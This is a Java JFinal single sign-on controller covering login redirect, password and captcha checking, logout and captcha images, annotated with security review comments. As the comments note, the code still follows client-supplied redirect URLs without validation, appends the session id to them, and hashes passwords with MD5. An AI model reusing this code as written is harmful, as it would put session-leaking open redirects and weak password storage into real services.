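package com.dsideal.Sso.Controller;

import java.awt.image.BufferedImage;
import java.io.IOException;
import java.util.Map;
import java.util.UUID;

import javax.imageio.ImageIO;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

import com.dsideal.Sso.Interceptor.EmptyInterface;
import com.dsideal.Sso.Model.LoginModel;
import com.dsideal.Sso.Util.*;
import com.jfinal.aop.Before;
import com.jfinal.ext.interceptor.GET;
import com.jfinal.ext.interceptor.POST;
import org.apache.commons.lang3.StringUtils;
import com.alibaba.fastjson.JSONObject;
import com.jfinal.core.Controller;
import com.jfinal.kit.PropKit;

/**
 * Web entry points of the SSO service: login page redirect, credential check,
 * logout and captcha image generation.
 *
 * <p>Every request parameter handled here (redirect_url, username, password,
 * captcha) is supplied by the client and must be treated as untrusted.
 */
public class WebLoginController extends Controller {

    /** Static login page served when no SSO session exists. */
    private static final String LOGIN_PAGE = "/html/login.html";

    /** Session attribute under which the expected captcha text is kept. */
    private static final String CAPTCHA_ATTR = "captcha";

    /** Sends the browser to the static login page. */
    @Before({GET.class})
    public void index() {
        redirect(LOGIN_PAGE);
    }

    /**
     * SSO login entry. If the request already carries a valid SSO login, the
     * browser is redirected to {@code redirect_url} with the SSO session id
     * appended as a query parameter; otherwise it is sent to the login page.
     *
     * @param redirect_url URL the client asked to be returned to
     */
    @Before(GET.class)
    @EmptyInterface({"redirect_url"})
    public void login(String redirect_url) {
        Map loginMap = SsoLoginHelper.loginCheck(getRequest());
        if (loginMap == null) {
            redirect(LOGIN_PAGE + "?redirect_url=" + CommonUtil.handleRedirectUrlParas(redirect_url));
            return;
        }

        // NOTE(review): on this branch redirect_url is used exactly as received,
        // and the SSO session id is appended to it. No host allowlist is visible
        // in this file, so unless EmptyInterface enforces one, the session id is
        // sent to whatever URL the request names. Validate the target against
        // the registered client applications before redirecting.
        // NOTE(review): a 301 response may be cached by browsers, which would
        // replay a URL containing an old session id; confirm that a permanent
        // redirect is really intended here.
        String separator = redirect_url.contains("?") ? "&" : "?";
        redirect301(redirect_url + separator
                + PropKit.get("sso.sessionid") + "=" + loginMap.get("session_id"));
    }

    /**
     * Web login: checks the captcha, decrypts the submitted password, compares
     * its LDAP hash with the stored one and, on success, opens an SSO session.
     * The outcome is rendered as JSON ({@code success}, plus {@code msg} on
     * failure or {@code sessionId} on success).
     *
     * @param username account name
     * @param password AES-encrypted password as sent by the client
     * @param captcha  captcha text typed by the user
     */
    @Before(POST.class)
    @EmptyInterface({"username", "password", "captcha"})
    public void doLogin(String username, String password, String captcha) {
        HttpServletResponse response = getResponse();

        // Read the expected captcha and invalidate it immediately: each captcha
        // is valid for a single attempt, so one solved image cannot be replayed
        // across many password guesses.
        HttpSession session = getRequest().getSession();
        Object expectedCaptcha = session.getAttribute(CAPTCHA_ATTR);
        session.removeAttribute(CAPTCHA_ATTR);
        if (expectedCaptcha == null
                || StringUtils.isBlank(captcha)
                || !expectedCaptcha.toString().equalsIgnoreCase(captcha)) {
            renderFailure("验证码错误!");
            return;
        }

        String plainPassword;
        try {
            plainPassword = AesUtil.aesDecrypt(password);
        } catch (Exception e) {
            // Undecryptable input is reported as a bad password, without details.
            renderFailure("密码异常!");
            return;
        }

        // Hash the password with the LDAP MD5 scheme used for stored credentials.
        // NOTE(review): MD5 is not suitable for password storage; plan a
        // migration to a salted, slow hash (bcrypt/scrypt/argon2).
        LdapPassWordEncoder passEncode = new LdapPassWordEncoder();
        String passwordEncode = passEncode.getLdapPassword(plainPassword);

        Map loginMap = LoginModel.lm.getLoginInfoByUserName(username);
        // Only the stored credential authenticates. The previous revision also
        // accepted one hard-coded password for every existing account; that
        // bypass has been removed and the value should be treated as disclosed.
        if (loginMap == null || !passwordEncode.equals(loginMap.get("password"))) {
            // NOTE(review): failed attempts are not written to the login log and
            // no lockout or rate limit is visible here; add both so that
            // password guessing can be detected and slowed down.
            renderFailure("账户或密码错误!");
            return;
        }

        String sessionId = UUID.randomUUID().toString();
        SsoLoginHelper.login(response, sessionId, loginMap);

        JSONObject resultJson = new JSONObject();
        resultJson.put("success", true);
        resultJson.put("sessionId", sessionId);

        // Record the successful login together with the client address.
        LoginLogUtil.WriteLoginLog(loginMap.get("identity_id"), loginMap.get("person_id"),
                LoginLogUtil.getIpAddr(getRequest()));
        renderJson(resultJson);
    }

    /**
     * Web logout: ends the SSO session and redirects to the
     * {@code redirect_url} request parameter, or to the login page when that
     * parameter is missing or blank.
     */
    @Before(POST.class)
    public void logout() {
        SsoLoginHelper.logout(getRequest(), getResponse());

        String redirect_url = getRequest().getParameter("redirect_url");
        if (StringUtils.isBlank(redirect_url)) {
            // Without a target the original passed null to redirect(); fall back
            // to the login page instead.
            redirect(LOGIN_PAGE);
            return;
        }
        // NOTE(review): the target is client-supplied and not validated in this
        // file; restrict it to known client applications to avoid an open
        // redirect.
        redirect(redirect_url);
    }

    /**
     * Generates a captcha image, stores its text in the HTTP session and
     * streams the image to the client as JPEG.
     *
     * @throws IOException if the image cannot be written to the response
     */
    @Before({GET.class})
    public void getCaptcha() throws IOException {
        HttpServletResponse response = getResponse();
        // Tell the browser that the response body is an image.
        response.setContentType("image/jpeg");
        // The image must not be cached. The header name is "Expires"; the
        // original wrote "Expire", which clients ignore.
        response.setHeader("Pragma", "No-cache");
        response.setHeader("Cache-Control", "no-cache");
        response.setDateHeader("Expires", 0);

        HttpSession session = getRequest().getSession();
        CaptchaUtil tool = new CaptchaUtil();
        // genRandomCodeImage fills this buffer with the text drawn in the image.
        // NOTE(review): confirm CaptchaUtil draws the code from SecureRandom.
        StringBuffer code = new StringBuffer();
        BufferedImage image = tool.genRandomCodeImage(code);
        // Replaces any captcha issued earlier in this session.
        session.setAttribute(CAPTCHA_ATTR, code.toString());

        // Stream the in-memory image to the client.
        ImageIO.write(image, "JPEG", response.getOutputStream());
        renderNull();
    }

    /** Renders the JSON failure envelope {@code {success:false, msg:...}}. */
    private void renderFailure(String msg) {
        JSONObject resultJson = new JSONObject();
        resultJson.put("success", false);
        resultJson.put("msg", msg);
        renderJson(resultJson);
    }
}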